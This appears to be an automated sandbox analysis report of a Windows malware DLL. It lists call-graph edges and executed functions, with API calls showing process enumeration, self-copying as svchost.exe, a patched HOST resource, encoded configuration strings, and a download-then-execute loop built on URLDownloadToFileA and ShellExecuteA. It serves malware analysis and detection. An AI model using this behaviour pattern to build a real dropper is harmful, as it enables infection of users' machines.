RegQueryValueExA 19520->19531 19532 1000de5b wsprintfA 19520->19532 19533 1000db97 RegQueryValueExA 19520->19533 19534 1000dc5a RegQueryValueExA 19520->19534 19541 1000db40 19520->19541 19551 1000deaf RegCloseKey RegCloseKey 19522->19551 19523 1000db19 19523->19497 19525->19522 19526->19530 19527->19522 19538 1000dde6 19527->19538 19528->19530 19529->19522 19537 1000dd1a wsprintfA 19529->19537 19530->19497 19531->19522 19542 1000db84 19531->19542 19532->19530 19533->19522 19543 1000dbc3 19533->19543 19534->19522 19536 1000dc86 wsprintfA 19534->19536 19535 1000dc46 19535->19497 19536->19522 19537->19529 19538->19526 19538->19528 19538->19530 19538->19532 19541->19522 19541->19525 19541->19526 19541->19528 19541->19530 19541->19531 19541->19532 19541->19533 19541->19534 19547 1000da60 19542->19547 19543->19522 19545 1000dbdd strncat strncat strchr 19543->19545 19545->19543 19546->19523 19548 1000da72 _strnicmp 19547->19548 19549 1000da83 19548->19549 19550 1000da87 19548->19550 19549->19548 19550->19522 19551->19535 19553 10001107 realloc 19552->19553 19555 10001037 19552->19555 19553->19507 19554 100010fe 19554->19507 19555->19553 19555->19554 19557 100098b0 5 API calls 19556->19557 19558 1000139a 19557->19558 19559 10001160 2 API calls 19558->19559 19560 100013a3 wsprintfA 19559->19560 19561 100098b0 5 API calls 19560->19561 19562 100013d7 GetSystemDirectoryA CreateFileA WriteFile CloseHandle 19561->19562 19562->19512 19566 10004270 19563->19566 19565 1000d376 CreateEventA 19565->19456 19566->19565 19567->19468 19568->19474 19569->19478 19571 10003640 VirtualFree 19570->19571 19572 1000364e RtlDeleteCriticalSection 19570->19572 19571->19572 19572->19482 19573 10015fd0 calloc 19574 401d21 GetVersion 19599 403204 HeapCreate 19574->19599 19576 401d80 19577 401d85 19576->19577 19578 401d8d 19576->19578 19681 401e3c 19577->19681 19611 403a29 19578->19611 19581 401d95 GetCommandLineA 19625 4038f7 19581->19625 19586 401daf 19657 4035f1 19586->19657 19588 401db4 19589 401db9 GetStartupInfoA 19588->19589 19670 403599 19589->19670 19591 401dcb GetModuleHandleA 19674 40156a GetVersionExA 19591->19674 19600 403224 19599->19600 19601 40325a 19599->19601 19694 4030bc 19600->19694 19601->19576 19604 403240 19607 40325d 19604->19607 19708 4029a7 19604->19708 19605 403233 19706 401e60 HeapAlloc 19605->19706 19607->19576 19608 40323d 19608->19607 19610 40324e HeapDestroy 19608->19610 19610->19601 19771 403261 19611->19771 19614 403a48 GetStartupInfoA 19622 403b59 19614->19622 19623 403a94 19614->19623 19617 403bc0 SetHandleCount 19617->19581 19618 403b80 GetStdHandle 19621 403b8e GetFileType 19618->19621 19618->19622 19619 403b05 19619->19622 19624 403b27 GetFileType 19619->19624 19620 403261 12 API calls 19620->19623 19621->19622 19622->19617 19622->19618 19623->19619 19623->19620 19623->19622 19624->19619 19626 403912 GetEnvironmentStringsW 19625->19626 19627 403945 19625->19627 19628 403926 GetEnvironmentStrings 19626->19628 19629 40391a 19626->19629 19627->19629 19630 403936 19627->19630 19628->19630 19631 401da5 19628->19631 19632 403952 GetEnvironmentStringsW 19629->19632 19633 40395e WideCharToMultiByte 19629->19633 19630->19631 19634 4039e4 19630->19634 19635 4039d8 GetEnvironmentStrings 19630->19635 19648 4036aa 19631->19648 19632->19631 19632->19633 19637 403992 19633->19637 19638 4039c4 FreeEnvironmentStringsW 19633->19638 19639 403261 12 API calls 19634->19639 19635->19631 19635->19634 19640 403261 12 API calls 19637->19640 19638->19631 19646 4039ff 19639->19646 19641 403998 19640->19641 19641->19638 19642 4039a1 WideCharToMultiByte 19641->19642 19644 4039bb 19642->19644 19645 4039b2 19642->19645 19643 403a15 FreeEnvironmentStringsA 19643->19631 19644->19638 19837 401cb8 19645->19837 19646->19643 19649 4036c1 GetModuleFileNameA 19648->19649 19650 4036bc 19648->19650 19651 4036e4 19649->19651 19867 404a55 19650->19867 19653 403261 12 API calls 19651->19653 19654 403705 19653->19654 19655 403715 19654->19655 19656 401e17 7 API calls 19654->19656 19655->19586 19656->19655 19658 4035fe 19657->19658 19660 403603 19657->19660 19659 404a55 19 API calls 19658->19659 19659->19660 19661 403261 12 API calls 19660->19661 19662 403630 19661->19662 19664 401e17 7 API calls 19662->19664 19669 403644 19662->19669 19663 403687 19665 401cb8 7 API calls 19663->19665 19664->19669 19666 403693 19665->19666 19666->19588 19667 403261 12 API calls 19667->19669 19668 401e17 7 API calls 19668->19669 19669->19663 19669->19667 19669->19668 19671 4035a2 19670->19671 19673 4035a7 19670->19673 19672 404a55 19 API calls 19671->19672 19672->19673 19673->19591 19675 4015cc GetWindowsDirectoryA wsprintfA 19674->19675 19676 40164d 19674->19676 19675->19676 19677 401633 GetFileAttributesA 19675->19677 19891 40152a 19676->19891 19677->19676 19679 401645 ExitProcess 19677->19679 19682 401e45 19681->19682 19683 401e4a 19681->19683 19684 403da4 7 API calls 19682->19684 19685 403ddd 7 API calls 19683->19685 19684->19683 19686 401e53 ExitProcess 19685->19686 19687 403340 19975 403362 19687->19975 19690 403415 19691 403421 19690->19691 19692 40354a UnhandledExceptionFilter 19691->19692 19693 401e09 19691->19693 19692->19693 19717 404620 19694->19717 19697 4030e5 19698 4030ff GetEnvironmentVariableA 19697->19698 19700 4030f7 19697->19700 19701 40311e 19698->19701 19705 4031dc 19698->19705 19700->19604 19700->19605 19702 403163 GetModuleFileNameA 19701->19702 19703 40315b 19701->19703 19702->19703 19703->19705 19719 404265 19703->19719 19705->19700 19722 40308f GetModuleHandleA 19705->19722 19707 401e7c 19706->19707 19707->19608 19709 4029b4 19708->19709 19710 4029bb HeapAlloc 19708->19710 19711 4029d8 VirtualAlloc 19709->19711 19710->19711 19712 402a10 19710->19712 19713 4029f8 VirtualAlloc 19711->19713 19714 402acd 19711->19714 19712->19608 19713->19712 19715 402abf VirtualFree 19713->19715 19714->19712 19716 402ad5 HeapFree 19714->19716 19715->19714 19716->19712 19718 4030c9 GetVersionExA 19717->19718 19718->19697 19718->19698 19724 40427c 19719->19724 19723 4030a6 19722->19723 19723->19700 19726 404294 19724->19726 19727 4042c4 19726->19727 19731 404e4a 19726->19731 19728 404e4a 6 API calls 19727->19728 19730 404278 19727->19730 19735 404d7e 19727->19735 19728->19727 19730->19705 19732 404e68 19731->19732 19733 404e5c 19731->19733 19741 40510e 19732->19741 19733->19726 19736 404da9 19735->19736 19737 404d8c 19735->19737 19738 404dc5 19736->19738 19739 404e4a 6 API calls 19736->19739 19737->19727 19738->19737 19753 404ebf 19738->19753 19739->19738 19742 405157 19741->19742 19743 40513f GetStringTypeW 19741->19743 19744 405182 GetStringTypeA 19742->19744 19745 4051a6 19742->19745 19743->19742 19746 40515b GetStringTypeA 19743->19746 19748 405243 19744->19748 19745->19748 19749 4051bc MultiByteToWideChar 19745->19749 19746->19742 19746->19748 19748->19733 19749->19748 19750 4051e0 19749->19750 19750->19748 19751 40521a MultiByteToWideChar 19750->19751 19751->19748 19752 405233 GetStringTypeW 19751->19752 19752->19748 19754 404f0b 19753->19754 19755 404eef LCMapStringW 19753->19755 19757 404f71 19754->19757 19758 404f54 LCMapStringA 19754->19758 19755->19754 19756 404f13 LCMapStringA 19755->19756 19756->19754 19759 40504d 19756->19759 19757->19759 19760 404f87 MultiByteToWideChar 19757->19760 19758->19759 19759->19737 19760->19759 19761 404fb1 19760->19761 19761->19759 19762 404fe7 MultiByteToWideChar 19761->19762 19762->19759 19763 405000 LCMapStringW 19762->19763 19763->19759 19764 40501b 19763->19764 19765 405021 19764->19765 19767 405061 19764->19767 19765->19759 19766 40502f LCMapStringW 19765->19766 19766->19759 19767->19759 19768 405099 LCMapStringW 19767->19768 19768->19759 19769 4050b1 WideCharToMultiByte 19768->19769 19769->19759 19780 403273 19771->19780 19774 401e17 19775 401e20 19774->19775 19776 401e25 19774->19776 19817 403da4 19775->19817 19823 403ddd 19776->19823 19781 403270 19780->19781 19783 40327a 19780->19783 19781->19614 19781->19774 19783->19781 19784 40329f 19783->19784 19785 4032ae 19784->19785 19787 4032c3 19784->19787 19792 4032bc 19785->19792 19793 4021fc 19785->19793 19788 403302 HeapAlloc 19787->19788 19787->19792 19799 402c9f 19787->19799 19789 403311 19788->19789 19789->19783 19790 4032c1 19790->19783 19792->19788 19792->19789 19792->19790 19797 40222e 19793->19797 19794 4022cd 19796 4022dc 19794->19796 19813 4025b6 19794->19813 19796->19792 19797->19794 19797->19796 19806 402505 19797->19806 19804 402cad 19799->19804 19800 402d99 VirtualAlloc 19805 402d6a 19800->19805 19801 402e6e 19802 4029a7 5 API calls 19801->19802 19802->19805 19804->19800 19804->19801 19804->19805 19805->19792 19807 402548 HeapAlloc 19806->19807 19808 402518 HeapReAlloc 19806->19808 19810 402598 19807->19810 19811 40256e VirtualAlloc 19807->19811 19809 402537 19808->19809 19808->19810 19809->19807 19810->19794 19811->19810 19812 402588 HeapFree 19811->19812 19812->19810 19814 4025c8 VirtualAlloc 19813->19814 19816 402611 19814->19816 19816->19796 19818 403dae 19817->19818 19819 403ddd 7 API calls 19818->19819 19822 403ddb 19818->19822 19820 403dc5 19819->19820 19821 403ddd 7 API calls 19820->19821 19821->19822 19822->19776 19825 403df0 19823->19825 19824 403f07 19828 403f1a GetStdHandle WriteFile 19824->19828 19825->19824 19826 403e30 19825->19826 19831 401e2e 19825->19831 19827 403e3c GetModuleFileNameA 19826->19827 19826->19831 19829 403e54 19827->19829 19828->19831 19832 404beb 19829->19832 19831->19614 19833 404bf8 LoadLibraryA 19832->19833 19834 404c3a 19832->19834 19833->19834 19835 404c09 GetProcAddress 19833->19835 19834->19831 19835->19834 19836 404c20 GetProcAddress GetProcAddress 19835->19836 19836->19834 19838 401cc4 19837->19838 19839 401ce0 19837->19839 19840 401ce4 19838->19840 19841 401cce 19838->19841 19839->19644 19842 401d0f 19840->19842 19846 401cfe 19840->19846 19843 401d10 HeapFree 19841->19843 19844 401cda 19841->19844 19842->19843 19843->19839 19848 401ed3 19844->19848 19854 402c5a 19846->19854 19849 401f11 19848->19849 19853 4021c7 19848->19853 19850 40210d VirtualFree 19849->19850 19849->19853 19851 402171 19850->19851 19852 402180 VirtualFree HeapFree 19851->19852 19851->19853 19852->19853 19853->19839 19855 402c87 19854->19855 19857 402c9d 19854->19857 19855->19857 19858 402b41 19855->19858 19857->19839 19861 402b4e 19858->19861 19859 402bfe 19859->19857 19860 402b6f VirtualFree 19860->19861 19861->19859 19861->19860 19863 402aeb VirtualFree 19861->19863 19864 402b08 19863->19864 19865 402b38 19864->19865 19866 402b18 HeapFree 19864->19866 19865->19861 19866->19861 19868 404a5e 19867->19868 19870 404a65 19867->19870 19871 404691 19868->19871 19870->19649 19878 40482a 19871->19878 19875 4046d4 GetCPInfo 19877 4046e8 19875->19877 19876 40481e 19876->19870 19877->19876 19883 4048d0 GetCPInfo 19877->19883 19879 40484a 19878->19879 19880 40483a GetOEMCP 19878->19880 19881 4046a2 19879->19881 19882 40484f GetACP 19879->19882 19880->19879 19881->19875 19881->19876 19881->19877 19882->19881 19886 4048f3 19883->19886 19890 4049bb 19883->19890 19884 40510e 6 API calls 19885 40496f 19884->19885 19887 404ebf 9 API calls 19885->19887 19886->19884 19888 404993 19887->19888 19889 404ebf 9 API calls 19888->19889 19889->19890 19890->19876 19892 401540 19891->19892 19899 401000 19892->19899 19895 401567 19895->19687 19900 401016 19899->19900 19913 40110e 19899->19913 19901 401027 VirtualAlloc 19900->19901 19900->19913 19902 401044 VirtualAlloc 19901->19902 19903 401058 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc 19901->19903 19902->19903 19902->19913 19904 4010ac 19903->19904 19928 40111d 19904->19928 19906 4010c4 19934 401301 19906->19934 19909 401104 19910 401487 11 API calls 19909->19910 19909->19913 19910->19913 19913->19895 19915 4013fd 19913->19915 19916 401463 19915->19916 19917 401419 19915->19917 19919 401487 19916->19919 19917->19916 19971 405270 19917->19971 19920 4014fc 19919->19920 19924 401493 19919->19924 19920->19895 19921 4014d7 19922 4014e0 VirtualFree 19921->19922 19923 4014ed GetProcessHeap HeapFree 19921->19923 19922->19923 19923->19920 19924->19921 19925 4014cf 19924->19925 19927 4014c2 FreeLibrary 19924->19927 19926 401cb8 7 API calls 19925->19926 19926->19921 19927->19924 19929 4011c5 19928->19929 19931 401146 19928->19931 19929->19906 19930 401188 VirtualAlloc 19930->19931 19931->19929 19931->19930 19932 401168 VirtualAlloc 19931->19932 19933 401183 19932->19933 19933->19931 19935 4010e0 19934->19935 19939 401327 19934->19939 19935->19909 19941 4011ca 19935->19941 19936 40132b IsBadReadPtr 19936->19935 19936->19939 19937 401347 LoadLibraryA 19937->19935 19937->19939 19939->19935 19939->19936 19939->19937 19940 4013be GetProcAddress 19939->19940 19947 401a18 19939->19947 19940->19939 19942 4010eb 19941->19942 19944 4011eb 19941->19944 19942->19909 19942->19913 19946 100028e0 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA 19942->19946 19943 40120c VirtualFree 19943->19944 19944->19942 19944->19943 19945 40125b VirtualProtect 19944->19945 19945->19944 19946->19909 19948 401a33 19947->19948 19949 401a25 19947->19949 19951 401a48 19948->19951 19952 401a3a 19948->19952 19950 403261 12 API calls 19949->19950 19956 401a2d 19950->19956 19954 401b58 19951->19954 19967 401a56 19951->19967 19953 401cb8 7 API calls 19952->19953 19953->19956 19955 401c73 19954->19955 19964 401b61 19954->19964 19955->19956 19957 401c81 HeapReAlloc 19955->19957 19956->19939 19957->19955 19957->19956 19958 401b16 HeapReAlloc 19958->19967 19959 401c39 HeapReAlloc 19959->19964 19960 401acf HeapAlloc 19963 401acc 19960->19963 19960->19967 19961 401bfd HeapAlloc 19961->19964 19968 401bc3 19961->19968 19962 4021fc 5 API calls 19962->19967 19963->19960 19966 401ed3 3 API calls 19963->19966 19963->19967 19964->19956 19964->19959 19964->19961 19964->19968 19965 402c9f 6 API calls 19965->19968 19966->19963 19967->19956 19967->19958 19967->19960 19967->19962 19967->19963 19969 401ed3 3 API calls 19967->19969 19968->19961 19968->19964 19968->19965 19970 402c5a VirtualFree HeapFree VirtualFree 19968->19970 19969->19967 19970->19968 19972 4052c3 19971->19972 19973 405288 19971->19973 19972->19973 19974 4052fc 15 API calls 19972->19974 19973->19917 19974->19972 19976 40336e GetCurrentProcess TerminateProcess 19975->19976 19977 40337f 19975->19977 19976->19977 19978 401df8 19977->19978 19979 4033e9 ExitProcess 19977->19979 19978->19690 19980 10015ff0 free 19981 100fa534 19983 100fa53b 19981->19983 19984 100fa54e VirtualAlloc 19983->19984 19985 100fa795 19983->19985 19986 100fa58e 19984->19986 19987 100fa8f9 ExitProcess 19984->19987 19988 100fa79f 19985->19988 19989 100fa7a9 19985->19989 19991 100fa599 19986->19991 19989->19987 19992 100fa5a8 19991->19992 19993 100fa60a VirtualFree 19992->19993 19995 100fa632 19993->19995 20002 100fa7b0 19995->20002 19996 100fa795 19998 100fa79f 19996->19998 19999 100fa7a9 19996->19999 19997 100fa776 VirtualProtect 19997->19996 19997->19997 19998->19985 20000 100fa8f9 ExitProcess 19999->20000 20000->19985 20001 100fa676 20001->19996 20001->19997 20001->20000 20003 100fa855 ExitProcess 20002->20003 20006 100fa7be 20002->20006 20003->20001 20005 100fa7d7 20005->20001 20006->20003 20006->20005

                        Executed Functions

                        Function 10001A20 Relevance: 257.9, APIs: 45, Strings: 102, Instructions: 645sleepfilenetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10001A52
                        • wsprintfA.USER32 ref: 10001A8E
                          • Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                          • Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                          • Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                          • Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                          • Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                          • Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
                          • Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
                          • Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                        • CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB6
                        • CloseHandle.KERNEL32(00000000), ref: 10001ABD
                        • Sleep.KERNEL32(000001F4), ref: 10001ACE
                        • FindFirstFileA.KERNEL32(?,?), ref: 10001AE0
                        • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B17
                        • strstr.MSVCRT ref: 10001B2A
                        • Sleep.KERNEL32(0000EA60), ref: 10001B40
                        • GetVersionExA.KERNEL32(?), ref: 10001B55
                        • GetSystemDefaultLCID.KERNEL32 ref: 10001B5B
                        • Sleep.KERNEL32(000927C0), ref: 10001BD7
                        • Sleep.KERNEL32(000DBBA0,?,?,?), ref: 10001CA0
                        • Sleep.KERNEL32(002932E0), ref: 10001CE5
                        • GetLocalTime.KERNEL32(?), ref: 10001CEF
                        • wsprintfA.USER32 ref: 10001D33
                        • _mkdir.MSVCRT ref: 10001D3D
                        • Sleep.KERNEL32(000003E8), ref: 10001D4B
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001DA5
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 10001DBD
                        • wsprintfA.USER32 ref: 10001DD6
                        • BeginUpdateResourceA.KERNEL32(?,00000000), ref: 10001DE5
                        • UpdateResourceA.KERNEL32(00000000,HOST,0000006C,00000000,?,00000104), ref: 10001E04
                        • EndUpdateResourceA.KERNEL32(00000000,00000000), ref: 10001E0D
                        • CloseHandle.KERNEL32(00000000), ref: 10001E14
                        • Sleep.KERNEL32(00000BB8), ref: 10001E1F
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10001E36
                        • Sleep.KERNEL32(0001D4C0), ref: 10001E41
                          • Part of subcall function 100127B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127B8
                          • Part of subcall function 100127B0: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,74DF0F10,74DF0F00,74DF2EE0,10002D11,Rstray.exe), ref: 100127C4
                          • Part of subcall function 100127B0: Process32First.KERNEL32(00000000,00000000), ref: 100127D6
                          • Part of subcall function 100127B0: _strcmpi.MSVCRT ref: 100127E8
                          • Part of subcall function 100127B0: Process32Next.KERNEL32(00000000,00000000), ref: 100127FF
                          • Part of subcall function 100127B0: lstrcmpiA.KERNEL32(00000024,?), ref: 1001280A
                          • Part of subcall function 100127B0: Process32Next.KERNEL32(00000000,00000000), ref: 10012816
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1000211A
                        • wsprintfA.USER32 ref: 10002130
                        • wsprintfA.USER32 ref: 10002142
                        • _mkdir.MSVCRT ref: 100021E1
                        • _mkdir.MSVCRT ref: 100021EB
                        • _mkdir.MSVCRT ref: 100021F5
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000234F
                        • Sleep.KERNEL32(00001388), ref: 10002359
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10002376
                        • Sleep.KERNEL32(00001388), ref: 1000237D
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10002395
                        • Sleep.KERNEL32(00001388,00000000,?,?,00000000,00000000), ref: 1000239F
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 100023B6
                        • Sleep.KERNEL32(00001388), ref: 100023BD
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 100023D2
                        • Sleep.KERNEL32(00001388,00000000,?,?,00000000,00000000), ref: 100023DC
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 100023F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Process32wsprintf$ExecuteShell_mkdir$CloseCreateDirectoryDownloadFirstHandleNextResourceUpdate$CurrentModuleNameProcessSnapshotSystemToolhelp32_strcmpi$??2@BeginCopyDefaultFindLocalOpenTimeVersionWindowslstrcmpistrstr
                        • String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$5$5$5$5$7$7$:$:$:$:$:$:$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$O$X$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$x$x$z
                        • API String ID: 1692959224-1608945047
                        • Opcode ID: 6ee373041fc5b69c202ed7c93a9450f5e25cfb3e9310397815dfb81335c8f99e
                        • Instruction ID: f4c19f8245f88184ae2cc9662bd1a6f0e6decc73936f8711890b7c2b7bd0bd37
                        • Opcode Fuzzy Hash: 6ee373041fc5b69c202ed7c93a9450f5e25cfb3e9310397815dfb81335c8f99e
                        • Instruction Fuzzy Hash: AB42812114C3C09AE322C7788859B9FBFD6ABE2744F48495DF2C9572C2CAF59608C767
                        Function 10002410 Relevance: 63.4, APIs: 31, Strings: 5, Instructions: 351sleepsynchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 37 10002410-1000246f call 100699b0 call 100098b0 * 3 46 10002480-100024cf sprintf CreateMutexA GetLastError 37->46 47 10002471-10002473 37->47 49 100024d1-100024d9 CloseHandle ExitProcess 46->49 50 100024df-10002556 GetCurrentProcessId OpenProcess SetPriorityClass CloseHandle GetProcessWindowStation OpenWindowStationA 46->50 47->46 48 10002475-10002477 47->48 48->46 51 10002479-1000247b 48->51 52 10002558-10002559 SetProcessWindowStation 50->52 53 1000255f-10002595 SetErrorMode call 10003990 call 100098b0 50->53 54 100028c3-100028da 51->54 52->53 59 100025d0-100025d7 53->59 60 10002597-100025cb call 1000c680 call 1000c6b0 call 1000c7f0 53->60 61 100025dc-100025e2 59->61 60->59 63 10002624-10002629 61->63 64 100025e4-100025e6 61->64 67 100026f6-1000272a call 100098b0 call 10001160 call 100011b0 63->67 68 1000262f-10002630 63->68 64->63 66 100025e8 64->66 71 100025ea-10002603 OpenEventA 66->71 101 10002747-10002766 GetTickCount call 10003b50 67->101 102 1000272c-10002732 67->102 73 10002632-10002633 68->73 74 100026a5-100026d9 call 100098b0 call 10001160 call 100011b0 68->74 76 10002614-1000261e call 10003fc0 CloseHandle 71->76 77 10002605-10002610 Sleep 71->77 80 10002635-1000263b 73->80 81 1000264f-10002684 call 100098b0 call 10001160 call 100011b0 73->81 74->101 104 100026db-100026e1 74->104 76->63 77->71 85 10002612 77->85 82 10002646-1000264d 80->82 83 1000263d-10002643 ??3@YAXPAX@Z 80->83 81->101 111 1000268a-10002690 81->111 82->61 83->82 85->63 112 10002768-1000276d 101->112 113 10002789-100027ee GetTickCount call 10001600 call 1000c5e0 call 10004270 101->113 106 10002734-1000273a ??3@YAXPAX@Z 102->106 107 1000273d-10002742 102->107 109 100026e3-100026e9 ??3@YAXPAX@Z 104->109 110 100026ec-100026f1 104->110 106->107 107->61 109->110 110->61 114 10002692-10002698 ??3@YAXPAX@Z 111->114 115 1000269b-100026a0 111->115 112->107 116 1000276f-10002770 112->116 125 100027f0-100027fe call 1000cfb0 113->125 114->115 115->61 116->110 118 10002776-10002777 116->118 118->115 120 1000277d-10002784 118->120 120->61 128 10002800-1000280b Sleep 125->128 129 1000280d-1000281b call 1000cfb0 125->129 128->125 128->129 132 10002836 GetTickCount 129->132 133 1000281d-10002831 call 1000c7f0 129->133 135 10002838-1000286a OpenEventA WaitForSingleObject Sleep 132->135 133->61 137 10002872-100028c2 call 10003fc0 CloseHandle call 1000c7f0 SetErrorMode ReleaseMutex CloseHandle call 10003a90 135->137 138 1000286c-1000286e 135->138 137->54 138->135 139 10002870 138->139 139->133
                        APIs
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • sprintf.MSVCRT ref: 100024A9
                        • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 100024BC
                        • GetLastError.KERNEL32 ref: 100024C4
                        • CloseHandle.KERNEL32(00000000), ref: 100024D2
                        • ExitProcess.KERNEL32 ref: 100024D9
                        • GetCurrentProcessId.KERNEL32 ref: 100024DF
                        • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100024EC
                        • SetPriorityClass.KERNEL32(00000000,00000080), ref: 100024FA
                        • CloseHandle.KERNEL32(00000000), ref: 10002501
                        • GetProcessWindowStation.USER32 ref: 1000253D
                        • OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000254E
                        • SetProcessWindowStation.USER32(00000000), ref: 10002559
                        • SetErrorMode.KERNEL32(00000001), ref: 10002561
                        • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100025F9
                        • Sleep.KERNEL32(0000003C), ref: 10002607
                        • CloseHandle.KERNEL32(00000000), ref: 1000261E
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000263E
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002693
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100026E4
                        • ??3@YAXPAX@Z.MSVCRT(?), ref: 10002735
                        • GetTickCount.KERNEL32 ref: 1000274D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
                        • String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
                        • API String ID: 2686462936-682215413
                        • Opcode ID: a8ca8c80a6142369269eae0f1b702b597b739753cb4697ee12a69c64f985840f
                        • Instruction ID: 3b4a00540ad0b1a63e2f642f75a40df8375a953d5dc77d0c7c87fc2ead154f6c
                        • Opcode Fuzzy Hash: a8ca8c80a6142369269eae0f1b702b597b739753cb4697ee12a69c64f985840f
                        • Instruction Fuzzy Hash: B8C1F3B55083819BF720DB64CC85F9B7399EB85380F00492DF9899325AEF74AD49C7A3
                        Function 100018A0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 112processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                        • Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                        • GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                        • _strcmpi.MSVCRT ref: 100019C8
                        • CloseHandle.KERNEL32(00000000), ref: 100019D2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
